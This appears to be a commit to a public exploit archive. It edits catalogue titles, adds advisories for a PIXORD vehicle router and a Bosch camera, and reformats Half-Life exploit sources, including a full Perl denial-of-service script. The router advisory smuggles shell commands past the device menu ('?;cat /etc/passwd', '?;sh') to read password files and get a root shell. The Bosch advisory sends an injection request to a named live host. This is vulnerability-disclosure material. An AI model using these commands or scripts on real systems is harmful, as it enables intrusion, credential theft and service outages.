 28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0
@ -27154,7 +27154,7 @@ id,file,description,date,author,platform,type,port
 30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80
 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0
 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0
-30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0
+30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0
 30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 - AuthError.CFM Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0
 30217,platforms/php/webapps/30217.txt,"Wrapper.PHP for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0
 30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure Vulnerability",2007-06-20,Prili,multiple,remote,0
@ -27594,7 +27594,7 @@ id,file,description,date,author,platform,type,port
 30645,platforms/windows/remote/30645.txt,"Microsoft Windows URI Handler Command Execution Vulnerability",2007-10-05,"Billy Rios",windows,remote,0
 30646,platforms/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 Location Header Remote Buffer Overflow Vulnerability",2007-07-16,"Nobuhiro Ban",linux,dos,0
 30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 News_page.PHP Cross-Site Scripting Vulnerability",2007-10-08,medconsultation.ru,php,webapps,0
-30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plug-in OGG Processing Remote Buffer Overflow Vulnerability",2007-10-08,Erik,linux,dos,0
+30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow Vulnerability",2007-10-08,Erik,linux,dos,0
 30649,platforms/cgi/webapps/30649.txt,"NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0
 30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 SIP From Field HTML Injection Vulnerability",2007-10-09,"Radu State",hardware,remote,0
 30651,platforms/php/webapps/30651.txt,"Webmaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Include Vulnerability",2007-10-10,Cyber-Crime,php,webapps,0
@ -28043,7 +28043,7 @@ id,file,description,date,author,platform,type,port
 31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin Local Stack Based Buffer Overflow Vulnerability",2008-02-12,forensec,linux,local,0
 31152,platforms/php/webapps/31152.txt,"artmedic weblog artmedic_print.php date Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
 31153,platforms/php/webapps/31153.txt,"artmedic weblog index.php jahrneu Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
-31154,platforms/php/webapps/31154.txt,"Counter Strike Portals 'download' SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
+31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
 31155,platforms/php/webapps/31155.txt,"Joomla! and Mambo com_iomezun Component - 'id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
 31156,platforms/php/webapps/31156.txt,"Cacti <= 0.8.7 graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
 31157,platforms/php/webapps/31157.txt,"Cacti <= 0.8.7 graph.php view_type Parameter XSS",2008-02-12,aScii,php,webapps,0
@ -28509,7 +28509,7 @@ id,file,description,date,author,platform,type,port
 31637,platforms/php/webapps/31637.txt,"W2B Dating Club - 'browse.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0
 31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager 7.x - (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0
 31639,platforms/php/webapps/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow Vulnerability",2008-04-11,david130490,php,webapps,0
-31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 - Add-On 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0
+31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0
 31641,platforms/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Parameter Cross-Site Scripting Vulnerability",2008-04-14,"Sebastien gioria",java,webapps,0
 31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - (PLS File) Buffer Overflow",2014-02-13,metasploit,windows,local,0
 31644,platforms/asp/webapps/31644.txt,"Cezanne 6.5.1/7 - CFLookUP.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0
@ -30689,7 +30689,7 @@ id,file,description,date,author,platform,type,port
 34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 SQL-Injection and Cross-Site Scripting Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0
 34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal Vulnerability",2010-05-27,"John Leitch",windows,remote,0
 34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal Vulnerability",2010-05-28,"John Leitch",windows,dos,0
-34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats Add-On 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0
+34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats AddOn - 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0
 34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection Vulnerabilities",2010-05-28,"High-Tech Bridge SA",php,webapps,0
 34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Include Vulnerability",2010-05-30,eidelweiss,php,webapps,0
 34055,platforms/php/webapps/34055.txt,"CMScout <= 2.08 - Cross-Site Scripting Vulnerability",2010-05-28,XroGuE,php,webapps,0
@ -31416,7 +31416,7 @@ id,file,description,date,author,platform,type,port
 34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80
 34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0
 34869,platforms/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0
-34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plug-in Remote Code Execution Vulnerability",2010-10-19,shinnai,windows,remote,0
+34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plugin - Remote Code Execution Vulnerability",2010-10-19,shinnai,windows,remote,0
 34871,platforms/php/webapps/34871.txt,"eCardMAX FormXP 'survey_result.php' Cross-Site Scripting Vulnerability",2009-07-15,Moudi,php,webapps,0
 34872,platforms/windows/dos/34872.py,"MASS PLAYER 2.1 File Processing Remote Denial of Service Vulnerability",2010-10-19,Sweet,windows,dos,0
 34873,platforms/php/webapps/34873.txt,"Wap-motor 'image' Parameter Directory Traversal Vulnerability",2009-08-27,Inj3ct0r,php,webapps,0
@ -32466,7 +32466,7 @@ id,file,description,date,author,platform,type,port
 36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component 'userid' Parameter SQL Injection Vulnerability",2011-08-03,"Ne0 H4ck3R",php,webapps,0
 36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 'zxpdf' Security Bypass Vulnerability",2011-08-04,"Chung-chieh Shan",multiple,remote,0
 36017,platforms/php/webapps/36017.txt,"HESK 2.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0
-36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plug-in 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0
+36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0
 36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 'TagSelector.aspx' Cross Site Scripting Vulnerability",2011-08-04,PontoSec,asp,webapps,0
 36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0
 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80
@ -32964,7 +32964,7 @@ id,file,description,date,author,platform,type,port
 36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 'users.php' Cross Site Scripting Vulnerability",2012-01-09,Am!r,php,webapps,0
 36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 'redirect_to' Parameter URI Redirection Vulnerability",2012-01-10,"Gianluca Brindisi",php,webapps,0
 36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 'downloads.php' Cross Site Scripting Vulnerability",2012-01-10,Am!r,php,webapps,0
-36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plug-in 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0
+36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0
 36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0
 36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0
 36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 KVM Local Denial of Service Vulnerability",2011-12-29,"Stephan Sattler",linux,dos,0
@ -34003,7 +34003,7 @@ id,file,description,date,author,platform,type,port
 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,metasploit,java,remote,0
 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0
-37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0
+37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0
 37670,platforms/osx/local/37670.sh,"OS X 10.10 - DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
 37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0
 37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross Site Scripting Vulnerability",2012-08-29,MustLive,php,webapps,0
@ -34656,3 +34656,12 @@ id,file,description,date,author,platform,type,port
 38366,platforms/multiple/webapps/38366.py,"Verax NMS Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps,0
 38367,platforms/php/webapps/38367.txt,"Your Own Classifieds Cross Site Scripting Vulnerability",2013-03-08,"Rafay Baloch",php,webapps,0
 38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability",2013-03-08,"Asheesh Anaconda",multiple,remote,0
 38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 Web Interface - XML Injection",2015-10-01,neom22,hardware,webapps,0
 38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0
 38371,platforms/osx/local/38371.py,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0
 38372,platforms/php/webapps/38372.html,"Question2Answer Cross Site Request Forgery Vulnerability",2013-03-01,MustLive,php,webapps,0
 38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id HTML Injection Vulnerability",2013-03-08,"Aditya Balapure",php,webapps,0
 38374,platforms/php/webapps/38374.txt,"SWFUpload Multiple Content Spoofing And Cross Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0
 38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics 'warning' Parameter Cross Site Scripting Vulnerability",2013-03-10,"Manuel García Cárdenas",php,webapps,0
 38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin 'playerID' Parameter Cross Site Scripting Vulnerability",2013-03-11,hiphop,php,webapps,0
 38377,platforms/php/webapps/38377.txt,"Privoxy Proxy Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0
--- a/platforms/hardware/remote/38370.txt
+++ b/platforms/hardware/remote/38370.txt
@ -0,0 +1,231 @@
 # Exploit Title: [Vehicle 3G Wi-Fi Router - PIXORD - Multiple
 Vulnerabilities]
 # Date: May 01, 2015 [No response from Vendor till date]
 # Discovered by: Karn Ganeshen
 # Vendor Homepage: [http://www.pixord.com/en/products_show.php?show=17]
 # Version: [Model Name :3GR-431P]
 [Software Version :RTA-A001_02]
 [Wireless Driver Version :2.6.0.0]
 *Vehicle 3G Wi-Fi Router - PIXORD *
 http://www.pixord.com/en/products_show.php?show=17
 *Device Info *
 Model Name :3GR-431P
 Software Version :RTA-A001_02
 Wireless Driver Version :2.6.0.0
 PiXORD 3GR-431P 3G Wi-Fi Router is a 3G + GPS + 802.11n (2T2R) wireless
 router. It supports Internet access via 3G and receives position
 information from GPS. 3GR-431P also supports two Ethernet ports for LAN
 connectivity and 802.11n Wi-Fi Access Point for WLAN connectivity.
 It is available to install the 3GR-431P on the transportation. The
 passengers can use the laptop or smart phone via Wi-Fi to browse the
 Internet on the go. The Ethernet port also can connect IP camera to provide
 the real time monitoring.
 Vulnerability Impact: Easy and full device compromise. Access to configured
 keys, passwords, pass-phrases, accounts, etc. Ability to monitor the user /
 vehicle via camera / connected devices.
 *Multiple Security Vulnerabilities *
 *1. OS command injection *
 $ telnet 192.168.1.10
 Trying 192.168.1.10...
 Connected to 192.168.1.10.
 Escape character is '^]'.
 Vehicle 3G Wi-Fi Router
 Login: admin
 Password:
 >
 > ?
 mobile3G
 mobileGPS
 model
 reboot
 restoredefault
 version
 As seen above, only few specific, functional options are available for
 device management.
 However, we can bypass this and dump hashes easily.
 > ?;cat /etc/passwd
 sh: ?: not found
 admin:<password1>:0:0:Adminstrator:/:/bin/sh
 support:<password2>:0:0:Adminstrator:/:/bin/sh
 user:<password3>:0:0:Adminstrator:/:/bin/sh
 > exit
 Note that this is also applicable when a non-admin ‘user’ / ‘support’ logs
 in over the Telnet.
 The web application lacks strict input validation and hence vulnerable to
 OS command injection attack.
 *2. Configuration not secured properly / AuthZ issues *
 The device has three users - admin, support, user.
 Apparently, there is no separation of privileges between these 3 users,
 when accessing over HTTP(S). All options are available to all three then.
 This allows 'user' /'support' to access device configuration file -
 RT2880_Settings.dat. Configuration backup contains b64-encoded login
 passwords + clear-text WPA keys + other sensitive information.
 .. …
 *Sensitive information in configuration file - *
 *more RT2880_Settings.dat *
 #The following line must not be removed.
 Default
 WebInit=1
 HostName=pixord
 Login=admin
 Password=<admin_password_here>=
 Login2=support
 Password2=<support_password_here>==
 Login3=user
 Password3=<user_password_here>==
 OperationMode=1
 Platform=RT3352
 .....
 <snip>
 .....
 wan_pppoe_user=pppoe_user
 wan_pppoe_pass=pppoe_passwd
 wan_l2tp_server=l2tp_server
 wan_l2tp_user=l2tp_user
 wan_l2tp_pass=l2tp_passwd
 .....
 <snip>
 .....
 wan_pptp_server=pptp_server
 wan_pptp_user=pptp_user
 wan_pptp_pass=pptp_passwd
 .....
 <snip>
 .....
 DDNS=
 DDNSAccount=<ddns_account_name_here>
 DDNSPassword=<ddns_password_here>
 CountryRegion=
 CountryRegionABand=
 CountryCode=
 BssidNum=1
 SSID1=PiXORD
 WirelessMode=9
 .....
 <snip>
 .....
 WscSSID=RalinkInitialAP
 WscKeyMGMT=WPA-EAP
 WscConfigMethod=138
 WscAuthType=1
 WscEncrypType=1
 WscNewKey=<wsc_key_here>
 IEEE8021X=0
 IEEE80211H=0
 CSPeriod=6
 PreAuth=0
 AuthMode=WPAPSKWPA2PSK
 EncrypType=TKIPAES
 RekeyInterval=3600
 RekeyMethod=TIME
 PMKCachePeriod=10
 WPAPSK1=<WPA_PSK_Key_here>
 DefaultKeyID=2
 Key1Type=0
 Key1Str1=
 Key2Type=0
 Key2Str1=
 Key3Type=0
 Key3Str1=
 Key4Type=0
 Key4Str1=
 WapiPskType=0
 .....
 <snip>
 .....
 WdsEnable=0
 WdsEncrypType=NONE
 WdsList=
 WdsKey=
 WirelessEvent=0
 RADIUS_Server=0
 RADIUS_Port=1812
 RADIUS_Key=
 RADIUS_Acct_Server=
 RADIUS_Acct_Port=1813
 RADIUS_Acct_Key=
 .....
 <snip>
 .....
 wan_3g_apn=public
 wan_3g_dial=*99#
 wan_3g_user=
 wan_3g_pass=
 <snip>
 RADIUS_Key1=<radius_key_here>
 .....
 <snip>
 .....
 Also, as observed in point 1 above, all the users have a UID 0, i.e. root
 level privileges to the device:
 admin:<password1>:0:0:Adminstrator:/:/bin/sh
 support:<password2>:0:0:Adminstrator:/:/bin/sh
 user:<password3>:0:0:Adminstrator:/:/bin/sh
 The application should ideally provide specific privileges to different
 users, and enforce strict access control.
 *3. Application does not secure configured passwords (HTTPS) *
 Masked password(s) can be retrieved via frame source (inspect element) and
 / or intercepting request via a proxy.
 The application should mask/censure (*****) the passwords, keys and any
 other crucial pieces of configuration and must not pass the values in
 clear-text.
 *4. Program / Scripts running in an insecure manner - leaking clear-text
 passwords in process information *
 After logging in to the device over Telnet, we can drop in to a shell via
 OS command injection attack described in point 1.
 > ?;sh
 sh: ?: not found
 Enter 'help' for a list of built-in commands.
 BusyBox v1.12.1 (2012-12-25 11:48:22 CST) built-in shell (ash)
 #
 Checking running processes reveal a system program *inadyn*, which
 apparently is a service for ddns connectivity, leaking valid username and
 password in clear-text.
 # ps aux
 PID USER VSZ STAT COMMAND
 1 admin 1768 S init
 2 admin 0 RWN [ksoftirqd/0]
 .....
 <snip>
 .....
 2159 admin 1096 S inadyn -u *<ddns-username_here>* -p *<ddns-password_here>*
 -a *<ddns_domain_here>*
 4050 admin 1768 R ps aux
 The programs should be run securely without passing cli arguments and
 parameter values in clear-text.
 -- 
 Best Regards,
 Karn Ganeshen
--- a/platforms/hardware/webapps/38369.txt
+++ b/platforms/hardware/webapps/38369.txt
@ -0,0 +1,100 @@
 # Exploit Title: Bosch Security Systems - XML Injection - Dinion NBN-498 Web Interface
 # Date: 01/09/2015
 # Exploit Author: neom22
 # Vendor Homepage: http://us.boschsecurity.com
 # Data Sheet: http://resource.boschsecurity.us/documents/Data_sheet_enUS_9007201286798987.pdf
 # Version: Hardware Firmware 4.54.0026 - Web Interface version is unknown
 # Tested on: Windows 8.1 - Firefox 40.0.3
 # CVE : CVE-2015-6970 (To be published)
 #################################################
 #                                                                                                        #
 #    Discovered by neom22                                                           #
 #    23 - 09 - 2015                                                                           #
 #                                                                                                        #
 #################################################
 #
 #
 Bosch Security Systems - Dinion NBN-498 - Web Interface (Live Feed and Administration)
 #
 #
 Vulnerability Discovery: 10/09/2015
 Vendor Contact: 17/09/2015 (no answer)
 Published: 24/09/2015
 #
 #
 Description: 
 -----------------------------------------------------------------
 The Dinion2x IP Day/Night camera is a high-performance, smart
 surveillance color camera. It incorporates 20-bit digital signal
 processing and a wide dynamic range sensor for outstanding
 picture performance under all lighting conditons.
 The camera uses H.264 compression technology to give clear
 images while reducing bandwidth and storage requirements. It
 is also ONVIF compliant to improve compatibility during system
 integration.
 The camera operates as a network video server and transmits
 video and control signals over data networks, such as Ethernet
 LANs and the Internet.
 -----------------------------------------------------------------
 Useful Links:
 Data Sheet: http://resource.boschsecurity.us/documents/Data_sheet_enUS_9007201286798987.pdf
 Documentation: http://resource.boschsecurity.us/documents/Installation_Manual_enUS_2032074379.pdf
 Product: 
 http://us.boschsecurity.com/en/us_product/products/video/ipcameras/sdfixedcameras/nbn498dinion2xdaynightipc/nbn498
 dinion2xdaynightipc_608
 -----------------------------------------------------------------
 XML Parameter Injection POC
 _-Request-_
 GET /rcp.xml?idstring=<string>injection</string> HTTP/1.1
 Host: postoipiranga.dyndns-ip.com:10004
 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Cookie: HcsoB=60cd4a687de94857
 Connection: keep-alive
 _-Response-_
 HTTP/1.1 200 OK
 Server: VCS-VideoJet-Webserver
 Connection: keep-alive
 Content-Type: text/xml
 Accept-Ranges: bytes
 Content-Length: 359
 Expires: 0
 Cache-Control: no-cache
 Set-Cookie: HcsoB=60cd4a687de94857; path=/;
 <rcp>
    <command>
        <hex>0x0000</hex>
        <dec>       0</dec>
    </command>
    <type>T_DWORD</type>
    <direction>READ</direction>
    <num>0</num>
    <idstring><string>injection</string></idstring>
    <payload></payload>
 <cltid>0x478e</cltid><sessionid>0x00000000</sessionid><auth>1</auth><protocol>TCP</protocol>    <result>
            <err>0x40</err>
    </result>
 </rcp>
--- a/platforms/linux/remote/22141.c
+++ b/platforms/linux/remote/22141.c
@ -1,8 +1,8 @@
-source: http://www.securityfocus.com/bid/6580/info
+//source: http://www.securityfocus.com/bid/6580/info
-A format string vulnerability has been discovered in the Half-Life AdminMod plugin. The problem occurs in commands which call the selfmessage() function, which is used by other functions to write a message to the users console. The format string occurs when the System_Response() function is called by selfmessage() to log the administrative command. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory.
+//A format string vulnerability has been discovered in the Half-Life AdminMod plugin. The problem occurs in commands which call the selfmessage() function, which is used by other functions to write a message to the users console. The format string occurs when the System_Response() function is called by selfmessage() to log the administrative command. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory.
-Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server.
+// Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server.
 /*****************************************************************
  * hoagie_adminmod.c
--- a/platforms/linux/remote/22968.c
+++ b/platforms/linux/remote/22968.c
@ -1,8 +1,8 @@
-source: http://www.securityfocus.com/bid/8300/info
+//source: http://www.securityfocus.com/bid/8300/info
-Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. 
+//Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-//check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. 
-This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.
+//This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.
 //
 // PRIV8 SECURITY & UHAGr CONFIDENTIAL SOURCE - DO NOT DISTRIBUTE !!!
--- a/platforms/linux/remote/22969.c
+++ b/platforms/linux/remote/22969.c
@ -1,8 +1,8 @@
-source: http://www.securityfocus.com/bid/8300/info
+// source: http://www.securityfocus.com/bid/8300/info
-Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server.
+// Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server.
-This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.
+// This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.
 /*****************************************************************
 * hoagie_hlserver.c
--- a/platforms/multiple/dos/1483.pl
+++ b/platforms/multiple/dos/1483.pl
@ -1,40 +1,40 @@
-#!/usr/bin/perl
+#!/usr/bin/perl
-# Server must not be running steam. /str0ke
+# Server must not be running steam. /str0ke
-
+
-
+
-# Half-Life engine remote DoS exploit
+# Half-Life engine remote DoS exploit
-# bug found by Firestorm
+# bug found by Firestorm
-# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server
+# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server
-use IO::Socket;
+use IO::Socket;
-die "usage: ./csdos <host>" unless $ARGV[0];
+die "usage: ./csdos <host>" unless $ARGV[0];
-$host=$ARGV[0];
+$host=$ARGV[0];
-
+
-if (fork())
+if (fork())
-{       econnect($host); }
+{       econnect($host); }
-else
+else
-{ econnect($host); };
+{ econnect($host); };
-exit;
+exit;
-
+
-sub econnect($)
+sub econnect($)
-{
+{
-        my $host=$_[0];
+        my $host=$_[0];
-        my $sock = new
+        my $sock = new
-IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
+IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
-        die "Could not create socket: $!\n" unless $sock;
+        die "Could not create socket: $!\n" unless $sock;
-        $cmd="\xff\xff\xff\xff";
+        $cmd="\xff\xff\xff\xff";
-        syswrite $sock, $cmd."getchallenge";
+        syswrite $sock, $cmd."getchallenge";
-
+
-        sysread $sock,$b,65535;  print $b,"\n";
+        sysread $sock,$b,65535;  print $b,"\n";
-        @c=split(/ /,$b);
+        @c=split(/ /,$b);
-
+
-        $c2=$c[1];
+        $c2=$c[1];
-
+
-        $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
+        $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
-print '>',$q,"\n";
+print '>',$q,"\n";
-syswrite $sock, $q;
+syswrite $sock, $q;
-sysread $sock,$b,65535; print $b,"\n";
+sysread $sock,$b,65535; print $b,"\n";
-sleep 3;
+sleep 3;
-close $sock;
+close $sock;
-}
+}
-
+
-# milw0rm.com [2006-02-11]
+# milw0rm.com [2006-02-11]
--- a/platforms/multiple/remote/22138.c
+++ b/platforms/multiple/remote/22138.c
@ -1,10 +1,10 @@
-source: http://www.securityfocus.com/bid/6575/info
+// source: http://www.securityfocus.com/bid/6575/info
-The Half-Life StatsMe plug-in is prone to an exploitable buffer overflow condition. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process.
+// The Half-Life StatsMe plug-in is prone to an exploitable buffer overflow condition. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process.
-Exploitation may be dependant on which other plug-ins are running on the Half-Life server.
+// Exploitation may be dependant on which other plug-ins are running on the Half-Life server.
-Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server. 
+// Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server. 
 /*****************************************************************
  * hoagie_statsme.c
--- a/platforms/multiple/remote/22139.c
+++ b/platforms/multiple/remote/22139.c
@ -1,8 +1,8 @@
-source: http://www.securityfocus.com/bid/6577/info
+//source: http://www.securityfocus.com/bid/6577/info
-A format string vulnerability has been discovered in the Half-Life ClanMod plugin. The problem occurs in the 'cm_log' command which is designed to write a message to the server log file. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory.
+// A format string vulnerability has been discovered in the Half-Life ClanMod plugin. The problem occurs in the 'cm_log' command which is designed to write a message to the server log file. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory.
-Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server. 
+// Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server. 
 /*****************************************************************
  * hoagie_clanmod.c
